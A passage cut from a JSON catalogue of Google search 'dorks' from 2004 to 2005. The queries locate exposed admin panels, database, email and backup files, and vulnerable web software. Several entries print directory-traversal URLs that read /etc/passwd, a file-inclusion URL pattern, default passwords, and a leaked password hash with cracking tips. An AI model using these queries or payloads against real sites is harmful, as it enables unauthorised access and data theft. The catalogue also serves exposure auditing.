The 4images administration control panel let you easily modify your galleries.", "submited": "2004-08-25", "request": "\"4images Administration Control Panel\"", "id": 452}, {"short description": "intitle:index.of /AlbumArt_", "long description": "Directories containing commercial music.AlbumArt_{.*}.jpg are download/create by MS-Windows Media Player in music directory.", "submited": "2004-08-26", "request": "intitle:index.of /AlbumArt_", "id": 453}, {"short description": "inurl:robpoll.cgi filetype:cgi", "long description": "robpoll.cgi is used to administrate polls.The default password used for adding polls is 'robpoll'. All of the results should look something like this: \"http://www.example.com/robpoll.cgi?start\". An attacker may change robpoll.cgi pointing to admin like this: \"http://www.example.com/robpoll.cgi?admin\".", "submited": "2004-08-30", "request": "inurl:robpoll.cgi filetype:cgi", "id": 454}, {"short description": "( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject", "long description": "storing emails in your webtree isnt a good idea.with this search google will show files containing emails like mail,eml,mbox or mbx with the keywords\"password\" or \"subject\" in the mail data.", "submited": "2004-08-26", "request": "( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject", "id": 455}, {"short description": "filetype:qbb qbb", "long description": "This search will show QuickBooks Bakup Files. 
Quickbook is financial accounting software so storing these files in a webtree is not a smart idea.", "submited": "2004-09-06", "request": "filetype:qbb qbb", "id": 456}, {"short description": "filetype:bkf bkf", "long description": "This search will show backupfiles for xp/2000 machines.Of course these files could contain nearly everything, depending on the user selection and they can also be password protected.", "submited": "2004-09-06", "request": "filetype:bkf bkf", "id": 457}, {"short description": "inurl:\"plog/register.php\"", "long description": "pLog is a popular form of bloggin software. Currently there are estimated about 1450 sites running it. The installation documents clearly warn about removing files after installation for security purposes:\"If you are not planning to allow internet users to create new blogs in this server, then you should also remove register.php.\"This search finds that register.php form of course :)Below is some more general information about pLog.Vendor site: hxxp://www.plogworld.org/Admin portals http://sitename/plog/admin.phpInstallation wizard: http://sitename/plog/wizard.phpConfig file (mysql db pass): http://sitename/plog/config/config.properties.phpTemp files: http://sitename/plog/tmp/Gallery files: http://sitename/plog/gallery/Blog search engine: http://www.plogworld.org/ploogle/", "submited": "2004-09-06", "request": "inurl:\"plog/register.php\"", "id": 458}, {"short description": "link:http://www.toastforums.com/", "long description": "Toast Forums is an ASP message board on the Internet. Toast Forums also has all the features of an advanced message board (see hxxp://www.toastforums.com/). The problem is in the install documentation (quoting):-- start quote --2. Rename the data.mdb file to a different name. After renaming the data.mdb file, open constants.asp and change the tstDBConnectString constant to reflect the new name. -- end quote --This search finds sites running Toast Forum by using the LINK: operator. 
Trial and error is needed to find the database file from the results by changing the URL. Member data can be found in the table \"tstdb_Member\". It looks like this:\"ID\" \"FName\" \"LName\" \"Username\" \"Password\" \"Email\" \"HideEmail\" \"ICQ\" \"Homepage\" \"Signature\" \"IP\" \"Skin\" \"IncludeSignature\" \"NotifyDefault\" \"PostCount\" \"LastLoginDate\" \"LastPostDate\"Passwords are encrypted with the RC4 algoritm, so an attacker would find cracking them is (more) difficult (than usual).", "submited": "2004-09-06", "request": "link:http://www.toastforums.com/", "id": 459}, {"short description": "snitz! forums db path error", "long description": "snitz forums uses a microsoft access databases for storage and the default name is \"Snitz_forums_2000.mdb\". The installation recommends changing both the name and the path. If only one is changed this database error occurs. An attacker may use this information as a hint to the location and the changed name for the database, thus rendering the forum vulnerable to hostile downloads.", "submited": "2004-09-07", "request": "databasetype. Code : 80004005. 
Error Description :", "id": 460}, {"short description": "\"Powered by Ikonboard 3.1.1\"", "long description": "IkonBoard (http://www.ikonboard.com/) is a comprehensive web bulletin board system, implemented as a Perl/CGI script.There is a flaw in the Perl code that cleans up user input before interpolating it into a string which gets passed to Perl's eval() function, allowing an attacker to evaluate arbitrary Perl and hence run arbitrary commands.More info at: http://www.securitytracker.com/alerts/2003/Apr/1006446.htmlThe bug was fixed in 3.1.2.", "submited": "2004-09-07", "request": "\"Powered by Ikonboard 3.1.1\"", "id": 461}, {"short description": "inurl:snitz_forums_2000.mdb", "long description": "The SnitzTM Forums 2000 Version 3.4.04 Installation Guide and Readme says: \"it is strongly recommended that you change the default database name from snitz_forums_2000.mdb to a cryptic or not easy to guess name.\"Of course, we know readme's are for lamers.. right admins ?[murfie@forofo googledorks]$ mdb-export snitz_forums_2000.mdb FORUM_MEMBERSMEMBER_ID,M_STATUS,M_NAME,M_USERNAME,M_PASSWORD,M_EMAIL, [etc]1,1,\"adminadmin\",\"58180bb12beb55a4bffbxxde75cxxc53dcc8061c3cdee52e0ebdcd74049d374e\",\"yourmail@server.com\",\" \",\" \",\"\",\"\",1,1,1,3,\" \",\" \",\" \",\"20030918120147\",2,\"20030918120207\",\"20030918120224\",\"Forum Admin\",\"10.xx.xx.72\",0,0,1,\"000.000.000.000\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\" \",\" \",\"\",\"\",\" \",\"\",\"\",\"\",\"\",1(data xx'd at some points) The password hash value is a SHA256 encoded string (with no salting). 
Every attacker knows they can be broken with a dictionary attack using a very simpel perl or C program.http://murfnet.xs4all.nl/public/scripts/perl/desnitz.txt", "submited": "2004-09-07", "request": "inurl:snitz_forums_2000.mdb", "id": 462}, {"short description": "WebAPP directory traversal", "long description": "WebAPP is advertised as the internet's most feature rich, easy to run PERL based portal system. The WebAPP system has a serious reverse directory traversal vulnerabilityhttp:///cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00http:///cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00Detailed info : http://www.packetstormsecurity.com/0408-exploits/webapp.traversal.txtCredits goes to PhTeam for discovering this vulnerability.", "submited": "2004-09-07", "request": "inurl:/cgi-bin/index.cgi inurl:topics inurl:viewca", "id": 463}, {"short description": "filetype:rdp rdp", "long description": "These are Remote Desktop Connection (rdp) files. They contain the settings and sometimes the credentials to connect to another windows computer using the RDP protocols.", "submited": "2004-09-07", "request": "filetype:rdp rdp", "id": 464}, {"short description": "filetype:reg \"Terminal Server Client\"", "long description": "These are Microsoft Terminal Services connection settings registry files. They may sometimes contain encrypted passwords and IP addresses.", "submited": "2004-09-07", "request": "filetype:reg \"Terminal Server Client\"", "id": 465}, {"short description": "inurl:\"nph-proxy.cgi\" \"Start browsing through this CGI-based proxy\"", "long description": "Observing the web cracker in the wild, one feels like they are watching a bear. 
Like a bear stocks up on food and then hibernates, a web cracker must stock up on proxies, and then hack until they run out.Web crackers are a distinct breed, and many do not comfort well with the draconian measures that many other crackers take, such as port and service scanning, the modern web cracker finds such tactics much too intrusive. This leaves the web cracker with the only viable option to come in contact with a large number of proxies being to use public proxy lists. These are of course very slow, and very very unstable, and do not allow the cracker much time between his proxy runs.Luckily google gives them another option, if they are smart enough to find it.CGI-proxy ( http://www.jmarshall.com/tools/cgiproxy/ ) is a CGI-based proxy application. It runs on a web server, and acts as an http proxy, in CGI form. A prudent site owner would hide it behind .htaccess, as most do, but with a powerful tool like google, the inprudent few who leave it open can quickly be seperated from the wise masses.CGI-proxy's default page contains the text, as you can see in the demo on their site:\"Start browsing through this CGI-based proxy by entering a URL below. Only HTTP and FTP URLs are supported. Not all functions will work (e.g. some JavaScript), but most pages will be fine.\"The proxy as it resides on a server is most often called nph-proxy.cgi. A web cracker can now use google to enumerate his list of proxy servers, like so:inurl:\"nph-proxy.cgi\" \"Start browsing through this CGI-based proxy\"More results can be obtained by admitting the \"inurl:nph-proxy.cgi\" constraint, but much more trash is generated as well.", "submited": "2004-09-09", "request": "inurl:\"nph-proxy.cgi\" \"Start browsing through this CGI-based proxy\"", "id": 466}, {"short description": "intitle:\"Index of *\" inurl:\"my shared folder\" size modified", "long description": "These are index pages of \"My Shared Folder\". Sometimes they contain juicy stuff like mp3's or avi files. 
Who needs pay sites for music when you got Google ? :) Uhm, well except for the copyright issue.", "submited": "2004-09-10", "request": "intitle:\"Index of *\" inurl:\"my shared folder\" size modified", "id": 467}, {"short description": "E-market remote code execution", "long description": "E-market is commercial software made by a korean company(http://www.bbs2000.co.kr). A vulnerability in this software was reported to Bugtraq. The exploit is possible with the index.php script:http://[TARGET]/becommunity/community/index.php?pageurl=[injection URL]http://[TARGET]/becommunity/community/index.php?from_market=Y&pageurl=[injection URL] For more information read this:http://echo.or.id/adv/adv06-y3dips-2004.txt Author: y3dipsDate: Sept, 7th 2004Location: Indonesian, Jakarta", "submited": "2004-09-10", "request": "inurl:\"/becommunity/community/index.php?pageurl=\"", "id": 468}, {"short description": "filetype:pot inurl:john.pot", "long description": "John the Ripper is a popular cracking program every hacker knows. It's results are stored in a file called john.pot.This search finds such results files, currently only one. Also No results for the distributed john version (djohn.pot) today :)PS: This was posted to the \"fun\" forum, so don't take this too seriously !", "submited": "2004-09-10", "request": "filetype:pot inurl:john.pot", "id": 469}, {"short description": "Gallery configuration setup files", "long description": "Gallery is a popular images package for websites. Unfortunately, with so many users, more bugs will be found and Google will find more installations. 
This search finds Gallery sites that seem to have left more or less dangerous files on their servers, like resetadmin.php and others.We call it Gallery in Setup mode :)", "submited": "2004-09-10", "request": "intitle:gallery inurl:setup \"Gallery configuration\"", "id": 470}, {"short description": "filetype:xls inurl:\"email.xls\"", "long description": "Our forum members never get tired of finding juicy MS office files. Here's one by urban that finds email addresses.", "submited": "2004-09-10", "request": "filetype:xls inurl:\"email.xls\"", "id": 471}, {"short description": "filetype:pdb pdb backup (Pilot | Pluckerdb)", "long description": "Hotsync database files can be found using \"All databases on a Palm device, including the ones you create using NS Basic/Palm, have the same format. Databases you create using NS Basic/Palm have the backup bit set by default, so they are copied to your \"x:\\palm\\{username}\\backup\"The forum members suggested adding Pilot and Pluckerdb (linux software for pda), so the results are more clean. (pdb files can be used for protein databases, which we don't want to see).Currently we don't know of a program to \"read\" these binary files.", "submited": "2004-09-10", "request": "filetype:pdb pdb backup (Pilot | Pluckerdb)", "id": 472}, {"short description": "filetype:pl \"Download: SuSE Linux Openexchange Server CA\"", "long description": "this search will get you on the web administration portal of linux open exchange servers.", "submited": "2004-09-10", "request": "filetype:pl \"Download: SuSE Linux Openexchange Server CA\"", "id": 473}, {"short description": "intitle:\"dreambox web\"", "long description": "this search will show web administration interfaces of linux dream boxes.The Dreambox is one of the popular 3rd generation boxes. Based on a powerful IBM PowerPC (not PC !) with an MPEG1/2 hardware decoder, this box is FULLY open, with an open source Linux operating system. 
The Dreambox not only offers high quality video and audio, but also has a variety of connections to the outside world: Ethernet, USB, PS2, Compact Flash and two Smartcard readers. The box can handle any dish configuration, an unlimited number of channels or satellites, has a very fast channel scan, allows for direct digital recording, etc.", "submited": "2004-09-10", "request": "intitle:\"dreambox web\"", "id": 474}, {"short description": "PHP-Nuke - create super user right now !", "long description": "PHP-Nuke is a popular web portal thingie. It has popped up in the Google dorks before. I think we let this one describe itself, quoting from a vulnerable page:\"Welcome to PHP-Nuke!Congratulations! You have now a web portal installed!. You can edit or change this message from the Administration page. For security reasons the best idea is to create the Super User right NOW by clicking HERE.\"", "submited": "2004-09-13", "request": "\"create the Super User\" \"now by clicking here\"", "id": 475}, {"short description": "filetype:asp DBQ=\" * Server.MapPath(\"*.mdb\")", "long description": "This search finds sites using Microsoft Access databases, by looking for the the database connection string. There are forums and tutorials in the results, but also the real databases. An attacker can use this to find the name and location of the database and download it for his viewing pleasure, which may lead to information leakage or worse.", "submited": "2004-09-18", "request": "filetype:asp DBQ=\" * Server.MapPath(\"*.mdb\")", "id": 476}, {"short description": "intitle:\"TUTOS Login\"", "long description": "TUTOS stands for \"The Ultimate Team Organization Software.\" This search finds the login portals to TUTOS.Adding scheme.php in the /php/ directory seems to allow cool things. There seems to be a foothold for SQL table structures and, upon errors, directory structure of the server. 
It is said that with the username linus and the password guest you can see what it looks like when your logged in. This is unconfirmed as of now.", "submited": "2004-09-18", "request": "intitle:\"TUTOS Login\"", "id": 477}, {"short description": "\"Login to Usermin\" inurl:20000", "long description": "Usermin is a web interface that can be used by any user on a Unix system to easily perform tasks like reading mail, setting up SSH or configuring mail forwarding. It can be thought of as a simplified version of Webmin designed for use by normal users rather than system administrators.", "submited": "2004-09-18", "request": "\"Login to Usermin\" inurl:20000", "id": 478}, {"short description": "filetype:lit lit (books|ebooks)", "long description": "Tired of websearching ? Want something to read ? You can find Ebooks (thousands of them) with this search..LIT files can be opened with Microsoft Reader (http://www.microsoft.com/reader/)", "submited": "2004-09-18", "request": "filetype:lit lit (books|ebooks)", "id": 479}, {"short description": "\"Powered *: newtelligence\" (\"dasBlog 1.6\"| \"dasBlog 1.5\"| \"dasBlog 1.4\"|\"dasBlog 1.3\")", "long description": "DasBlog is reportedly susceptible to an HTML injection vulnerability in its request log. This vulnerability is due to a failure of the application to properly sanitize user-supplied input data before using it in the generation of dynamic web pages. Versions 1.3 - 1.6 are reported to be vulnerable.More:http://www.securityfocus.com/bid/11086/discussion/", "submited": "2004-09-18", "request": "\"Powered *: newtelligence\" (\"dasBlog 1.6\"| \"dasBlog 1.5\"| \"dasBlog 1.4\"|\"dasBlog 1.3\")", "id": 480}, {"short description": "Lotus Domino address books", "long description": "This search will return any Lotus Domino address books which may be open to the public. This can contain a lot of detailed personal info you don't want to fall in the hands of your competitors or hackers. 
Most of them are password protected.", "submited": "2004-09-18", "request": "inurl:\"/names.nsf?OpenDatabase\"", "id": 481}, {"short description": "intitle:\"Login - powered by Easy File Sharing Web Server\"", "long description": "Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE,Netscape,Opera etc.)\". More information at: http://www.securityfocus.com/bid/11034/discussion/An attacker can reportedly bypass the authentication by entering the the name of the virtual folder directly.", "submited": "2004-09-18", "request": "intitle:\"Login - powered by Easy File Sharing Web", "id": 482}, {"short description": "intitle:\"Tomcat Server Administration\"", "long description": "This finds login portals for Apache Tomcat, an open source Java servlet container which can run as a standalone server or with an Apache web server.", "submited": "2004-09-18", "request": "intitle:\"Tomcat Server Administration\"", "id": 483}, {"short description": "ez Publish administration", "long description": "Thousands of enterprises, governmental offices, non-profit organizations, small and middle sized companies and educational institutions around the world trust eZ publish for running their web solutions.Vendor site: http://www.ez.no/Vulnerabilities: http://search.securityfocus.com/swsearch?query=ez+publish&sbm=bid&submit=Search%21&metaname=alldoc&sort=swishlastmodifiedDepending on the version two queries can usedAdmin intitle:\"eZ publish administration\"intitle:\"Login\" \"Welcome to eZ publish administration\"Crosssite Scriting, Information Disclosure, Pathdisclosure available on older versions", "submited": "2004-09-21", "request": "Admin intitle:\"eZ publish administration\"", "id": 484}, {"short description": "inurl:administrator \"welcome to mambo\"", "long description": "Mambo is a full-featured content management system that can be used for everything from simple websites to complex corporate 
applications. Continue reading for a detailed feature list. Vendor: http://www.mamboserver.com/ Cross Site Scripting and SQL injection exist in some versions 4.5 current version is 4.5.1RC3 Vulnerabilities: http://search.securityfocus.com/swsearch?query=mambo+open+source&sbm=bid&submit=Search%21&metaname=alldoc", "submited": "2004-09-21", "request": "inurl:administrator \"welcome to mambo\"", "id": 485}, {"short description": "\"Powered by DCP-Portal v5.5\"", "long description": "DCP-Portal is more a community system than a CMS - it nevertheless calls itself a CMS. They have never seen a real CMS. Version 5.5 is vulnerable to SQL injection. Vulnerabilities: http://search.securityfocus.com/swsearch?query=dcp-portal&sbm=bid&submit=Search%21&metaname=alldoc", "submited": "2004-09-21", "request": "\"Powered by DCP-Portal v5.5\"", "id": 486}, {"short description": "inurl:\"typo3/index.php?u=\" -demo", "long description": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules. Vendor: http://www.typo3.com/ Vulns: http://search.securityfocus.com/swsearch?query=Typo3&sbm=bid&submit=Search%21&metaname=alldoc", "submited": "2004-09-21", "request": "inurl:\"typo3/index.php?u=\" -demo", "id": 487}, {"short description": "intitle:index.of (inurl:fileadmin | intitle:fileadmin)", "long description": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules. The fileadmin directory is the storage for all user data like website templates, graphics, documents and so on. 
Normally no sensitive data will be stored here except the one made available in restricted areas.Unprotected fileadmin directories can be found by an attacker using this query.Vendor: http://www.typo3.com/", "submited": "2004-09-21", "request": "intitle:index.of (inurl:fileadmin | intitle:fileadmin)", "id": 488}, {"short description": "Quicksite demopages for Typo3", "long description": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.The quicksite package is a demosite for typo3. Quicksite or Testsite will install a complete website of a soccerclub using the following credentials:user:adminpassword:passwordIf you want to login, again append \"typo3\" to the website dir.Vendor: http://www.typo3.com/An attacker will consider this as yet another way to find Typo3 hosts for which security focus lists vulnerabilities.", "submited": "2004-09-21", "request": "\"FC Bigfeet\" -inurl:mail", "id": 489}, {"short description": "site:netcraft.com intitle:That.Site.Running Apache", "long description": "Netcraft reports a site's operating system, web server, and netblock owner together with, if available, a graphical view of the time since last reboot for each of the computers serving the site. So, Netcraft scans Web servers, Google scans Netcraft, and the hacker scans Google.This search is easily modified (replace \"apache\" for the other server software), thus adding yet another way to find the webserver software version info.", "submited": "2004-09-21", "request": "site:netcraft.com intitle:That.Site.Running Apache", "id": 490}, {"short description": "ext:log \"Software: Microsoft Internet Information Services *.*\"", "long description": "Microsoft Internet Information Services (IIS) has log files that are normally not in the docroot, but then again, some people manage to share them. 
An attacker may use these to gather: loginnames (FTP service), pathinformation, databasenames, and stuff..Examples:12:09:37 194.236.57.10 [2501]USER micze 33112:09:38 194.236.57.10 [2501]PASS - 23008:30:38 194.236.57.10 [2416]DELE com-gb97.mdb2000-06-18 15:08:30 200.16.212.225 activeip\\carpinchos 4.22.121.13 80 POST /_vti_bin/_vti_aut/author.dll - 200 2958 551 120 MSFrontPage/4.0 -", "submited": "2004-09-21", "request": "ext:log \"Software: Microsoft Internet Information Services *.*\"", "id": 491}, {"short description": "filetype:cgi inurl:tseekdir.cgi", "long description": "The Turbo Seek search engine has a vulnerability. The removed user can look at the contents of files on target. A removed user can request an URL with name of a file, which follows NULL byte (%00) to force system to display the contents of a required file, for example:/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00/cgi-bin/tseekdir.cgi?id=799*location=/etc/passwd%00 More: http://www.securitytracker.com/alerts/2004/Sep/1011221.html", "submited": "2004-09-21", "request": "filetype:cgi inurl:tseekdir.cgi", "id": 492}, {"short description": "\"Powered by phpOpenTracker\" Statistics", "long description": "phpOpenTracker is a framework solution for the analysis of website traffic and visitor analysis. More info at the vendor site: http://www.phpopentracker.de/en/index.phpA prebuild sample report is shipped with PhpOpenTracker which is used by most sites. This report does not use all possibilities of the framework like user tracking.", "submited": "2004-09-21", "request": "\"Powered by phpOpenTracker\" Statistics", "id": 493}, {"short description": "filetype:vcs vcs", "long description": "Filext.com says: \"Various programs use the *.VCS extension; too many to list individually. Take clues from the location of the file as a possible pointer to exactly which program is producing the file. 
The file's date and time can also help if you know which programs you were running when the file was written.\"The most common use is the \"vCalendar File\", used by Outlook for example. It can also belong to a \"Palm vCal Desktop Application\". For those who prefer clean searches, try these variations (with less results):\"PRODID: PalmDesktop Generated\"filetype:vcs VCALENDAR filetype:vcs BEGIN:VCALENDAR", "submited": "2004-09-22", "request": "filetype:vcs vcs", "id": 494}, {"short description": "filetype:config config intext:appSettings \"User ID\"", "long description": "These files generally contain configuration information for a .Net Web Application. Things like connection strings to databases file directories and more. On a properly setup IIS these files are normally not served to the public.", "submited": "2004-09-16", "request": "filetype:config config intext:appSettings \"User ID\"", "id": 495}, {"short description": "inurl:\"/catalog.nsf\" intitle:catalog", "long description": "This will return servers which are running versions of Lotus Domino. The catalog.nsf is the servers DB catalog. It will list all the DB's on the server and sometimes some juicy info too. 
An attacker can back the url down to the \"/catalog.nsf\" part if needed.", "submited": "2004-09-10", "request": "inurl:\"/catalog.nsf\" intitle:catalog", "id": 496}, {"short description": "filetype:pst inurl:\"outlook.pst\"", "long description": "All versions of the popular business groupware client called Outlook have the possibility to store email, calenders and more in a file for backup or migration purposes.An attacker may learn a great deal about the owner or the company by downloading these files and importing them in his own client for his viewing pleasure.", "submited": "2004-09-11", "request": "filetype:pst inurl:\"outlook.pst\"", "id": 497}, {"short description": "\"index of/\" \"ws_ftp.ini\" \"parent directory\"", "long description": "This search is a cleanup of a previous entry by J0hnny. It uses \"parent directory\" to avoid results other than directory listings.WS_FTP.ini is a configuration file for a popular win32 FTP client that stores usernames and weakly encoded passwords. There is another way to find this file, that was added by Xewan:filetype:ini ws_ftp pwdIn our experience it's good to try both methods, as the results will differ quite a bit.", "submited": "2004-09-17", "request": "\"index of/\" \"ws_ftp.ini\" \"parent directory\"", "id": 498}, {"short description": "filetype:php inurl:index.php inurl:\"module=subjects\" inurl:\"func=*\" (listpages| viewpage | listcat)", "long description": "Reportedly the PostNuke Modules Factory Subjects module is affected by a remote SQL injection vulnerability. 
http://securityfocus.com/bid/11148/discussion/", "submited": "2004-09-23", "request": "filetype:php inurl:index.php inurl:\"module=subjects\" inurl:\"func=*\" (listpages| viewpage | listcat)", "id": 499}, {"short description": "W-Nailer Upload Area", "long description": "What is W-Nailer?W-Nailer is a PHP script which can create galleries for you.It uses a graphical library (GD) which enables PHP to manipulate images, for instance resizing to create thumbnails.W-Nailer is highly configurable to meet your needs. Even better, the configuration is nearly completely webbased.So after you have uploaded your files, you will just need your browser!", "submited": "2005-01-13", "request": "uploadpics.php?did= -forum", "id": 500}, {"short description": "filetype:cgi inurl:pdesk.cgi", "long description": "PerlDesk is a web based help desk and email management application designed to streamline support requests, with built in tracking and response logging.http://www.securitytracker.com/alerts/2004/Sep/1011276.html", "submited": "2004-09-23", "request": "filetype:cgi inurl:pdesk.cgi", "id": 501}, {"short description": "ext:ldif ldif", "long description": "www.filext.com says LDIF = LDAP Data Interchange Format. LDAP is used for nearly everything in our days, so this file may include some juicy info for attackers. They can add INTEXT:keyword to get more specific targets.", "submited": "2004-09-23", "request": "ext:ldif ldif", "id": 502}, {"short description": "inurl:mewebmail", "long description": "MailEnable Standard Edition provides robust SMTP and POP3 services for Windows NT/2000/XP/2003 systems. This version is free for both personal and commercial usage and does not have any time, user or mailbox restrictions. This search is a portal search. It finds the login screens. 
If a vulnerability is found, this search becomes the target base for an attacker.", "submited": "2004-09-23", "request": "inurl:mewebmail", "id": 503}, {"short description": "\"Powered by IceWarp Software\" inurl:mail", "long description": "IceWarp Web Mail is reported prone to multiple input validation vulnerabilities. Few details regarding the specific vulnerabilities are known. These vulnerabilities are reported to affect all versions of IceWarp Web Mail prior to version 5.2.8.There are two ways to find installations of IceWarp:\"Powered by IceWarp Software\" inurl:mailintitle:\"IceWarp Web Mail\" inurl:\":32000/mail/\"http://www.securityfocus.com/bid/10920", "submited": "2004-09-23", "request": "\"Powered by IceWarp Software\" inurl:mail", "id": 504}, {"short description": "inurl:/_layouts/settings", "long description": "With the combined collaboration features of Windows SharePoint Services and SharePoint Portal Server 2003, users in an organization can create, manage, and build collaborative Web sites and make them available throughout the organization. More information is available at : http://www.microsoft.com/sharepoint/Loads of company info can be gained by an attacker when the URL's are unprotected. Furthermore unprotected sharepoint sites give full \"Edit, Add and Delete access\" to the information, which in case of malicious users may cause loss of important data.", "submited": "2004-09-23", "request": "inurl:/_layouts/settings", "id": 505}, {"short description": "intitle:\"MRTG/RRD\" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)", "long description": "The remote user can reportedly view the first string of any file on the system where script installed. 
This is a very old bug, but some sites never upgraded their MRTG installations.http://www.securitytracker.com/alerts/2002/Feb/1003426.htmlAn attacker will find it difficult to exploit this in any usefull way, but it does expose one line of text from a file, for example (using the file /etc/passwd) shows this:ERROR: CFG Error Unknown Option \"root:x:0:1:super-user:/\" on line 2 or above.", "submited": "2004-09-24", "request": "intitle:\"MRTG/RRD\" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)", "id": 506}, {"short description": "filetype:mdb wwforum", "long description": "Web Wiz Forums is a free ASP Bulletin Board software package. It uses a Microsoft Access database for storage. The installation instructions clearly indicate to change the default path and filename (admin/database/wwForum.mdb).vendor: http://www.webwizguide.info/web_wiz_forums/The forum database contains the members passwords, either encrypted or in plain text, depending on the version.Please note: this search is proof that results can stay in Google's index for a long time, even when they are not on the site any longer. Currently only 2 out of 9 are actually still downloadable by an attacker.", "submited": "2004-09-24", "request": "filetype:mdb wwforum", "id": 507}, {"short description": "\"Powered By Elite Forum Version *.*\"", "long description": "Elite forums is one of those Microsoft Access .mdb file based forums. This one is particularly dangerous, because the filename and path are hardcoded in the software. 
An attacker can modify index.php for ./data/users/userdb.dat, open the file and see something like this:42administrat4571XXX367b52XXXb33b6ce74df1e0170(data was xx'd)These are MD5 digests and can be brute forced (with enough time) or dictionary cracked by a malicious user, thus giving adminstrator access to the forum.", "submited": "2004-09-24", "request": "\"Powered By Elite Forum Version *.*\"", "id": 508}, {"short description": "intitle:\"microsoft certificate services\" inurl:certsrv", "long description": "Microsoft Certificate Services Authority (CA) software can be used to issue digital certificates. These are often used as \"proof\" that someone or something is what they claim they are. The Microsoft certificates are meant to be used with IIS for example with Outlook Web Access. The users of these certificates have to decide if they trust it or not. If they do, they can import a root certificate into their browsers (IE).Anyways, this search by JimmyNeutron uncovers a few of these certificate servers directly connected to the Internet. Which (in theory) means anyone could issue a certificate from these sites and abuse it to mislead websurfers in phishing scams and such.", "submited": "2004-09-24", "request": "intitle:\"microsoft certificate services\" inurl:certsrv", "id": 509}, {"short description": "intitle:\"webadmin - /*\" filetype:php directory filename permission", "long description": "Webadmin.php is a free simple Web-based file manager. This search finds sites that use this software. 
If left unprotected, files can be modified or added on the server by an attacker. More info and screenshot at: http://cker.name/webadmin/", "submited": "2004-09-24", "request": "intitle:\"webadmin - /*\" filetype:php directory filename permission", "id": 510}, {"short description": "intitle:AnswerBook2 inurl:ab2/ (inurl:8888 | inurl:8889)", "long description": "First of all this search indicates solaris machines and second the webservice is vulnerable to a format string attack. Sun's AnswerBook 2 utilizes a third-party web server daemon (dwhttpd) that suffers from a format string vulnerability. The vulnerability can be exploited to cause the web server process to execute arbitrary code. The web server runs as user and group 'daemon' who, under recent installations of Solaris, owns no critical files. http://www.securiteam.com/unixfocus/5SP081F80K.htm", "submited": "2004-09-26", "request": "intitle:AnswerBook2 inurl:ab2/ (inurl:8888 | inurl:8889)", "id": 511}, {"short description": "More Axis netcams !", "long description": "More Axis Netcams, this search combines the cams with the default title (Live View) and extends it by searching for the \"view/view.shtml\" URL identifier. 
Models found with this search are:AXIS 205 version 4.02AXIS 206M Network Camera version 4.10AXIS 206W Network Camera version 4.10AXIS 211 Network Camera version 4.02AXIS 241S Video Server version 4.02AXIS 241Q Video Server version 4.01Axis 2100 Network CameraAxis 2110 Network Camera 2.34Axis 2120 Network Camera 2.40AXIS 2130R PTZ Network Camera", "submited": "2004-09-29", "request": "intitle:\"Live View / - AXIS\" | inurl:view/view.sht", "id": 512}, {"short description": "intitle:\"The AXIS 200 Home Page\"", "long description": "The Axis 200 HOME pages reside within the AXIS 200 device and hold information about the current software version, technical documentation, some howto's and the device settings.", "submited": "2004-09-29", "request": "intitle:\"The AXIS 200 Home Page\"", "id": 513}, {"short description": "(\"Fiery WebTools\" inurl:index2.html) | \"WebTools enable * * observe, *, * * * flow * print jobs\"", "long description": "Fiery WebTools offers many of the same capabilities of the Command WorkStation, via a Java-enabled Web browser. All job control options such as job merging, edition and previews, as well as information on the status of the jobs are accessible through Fiery WebTools.", "submited": "2004-09-29", "request": "(\"Fiery WebTools\" inurl:index2.html) | \"WebTools enable * * observe, *, * * * flow * print jobs\"", "id": 514}, {"short description": "Konica Network Printer Administration", "long description": "This finds Konica Network Printer Administration pages. 
There is one result at the time of writing.", "submited": "2004-09-29", "request": "intitle:\"network administration\" inurl:\"nic\"", "id": 515}, {"short description": "Aficio 1022", "long description": "The Ricoh Aficio 1022 is a digital multifunctional B&W copier, easily upgraded to include network printing, network scanning, standard/LAN faxing and storage capabilities.", "submited": "2004-09-29", "request": "inurl:sts_index.cgi", "id": 516}, {"short description": "intitle:RICOH intitle:\"Network Administration\"", "long description": "Network Administration pages for several Ricoh Afficio printer models, for example the Aficio 1018D and RICOH LASER AP1600.", "submited": "2004-09-29", "request": "intitle:RICOH intitle:\"Network Administration\"", "id": 517}, {"short description": "intitle:\"lantronix web-manager\"", "long description": "The Lantronix web manager home pages show the print server configuration (Server Name, Boot Code Version, Firmware, Uptime, Hardware Address, IP Address and Subnet Mask). The other setting pages are password protected.", "submited": "2004-09-29", "request": "intitle:\"lantronix web-manager\"", "id": 518}, {"short description": "Canon ImageReady machines", "long description": "The \"large\" Canon ImageReady machines with model versions 3300, 5000 & 60000.", "submited": "2004-09-29", "request": "intitle:\"remote ui:top page\"", "id": 519}, {"short description": "((inurl:ifgraph \"Page generated at\") OR (\"This page was built using ifgraph\"))", "long description": "ifGraph is a set of perl scripts that were created to fetch data from SNMP agents and feed a RRD file (Round Robin Database) so that graphics can be created later. 
